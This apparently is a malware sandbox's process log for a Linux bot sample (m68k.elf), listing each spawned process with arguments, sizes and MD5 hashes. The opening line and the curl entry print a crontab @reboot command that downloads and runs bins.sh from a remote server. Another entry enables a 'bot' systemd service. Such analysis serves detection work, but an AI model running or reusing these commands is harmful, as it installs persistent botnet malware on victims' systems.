Arguments: | sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x bins.sh |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/sh |
Arguments: | sh bins.sh |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/curl |
Arguments: | /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh |
File size: | 239848 bytes |
MD5 hash: | add6bc2195e82c55985ccf49fd4048e6 |
Start time (UTC): | 23:57:04 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:04 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x bins.sh |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 23:57:04 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/sh |
Arguments: | sh bins.sh |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 23:57:04 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/m68k.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 23:57:04 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "/bin/systemctl enable bot" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:04 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:04 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/systemctl |
Arguments: | /bin/systemctl enable bot |
File size: | 996584 bytes |
MD5 hash: | 4deddfb6741481f68aeac522cc26ff4b |
Start time (UTC): | 23:57:04 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/lib/systemd/systemd |
Arguments: | - |
File size: | 1620224 bytes |
MD5 hash: | 9b2bec7092a40488108543f9334aab75 |
Start time (UTC): | 23:57:04 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
Arguments: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File size: | 22760 bytes |
MD5 hash: | 3633b075f40283ec938a2a6a89671b0e |
Start time (UTC): | 23:58:15 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/dash |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:58:15 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/rm |
Arguments: | rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
Start time (UTC): | 23:58:15 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/dash |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:58:15 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/rm |
Arguments: | rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |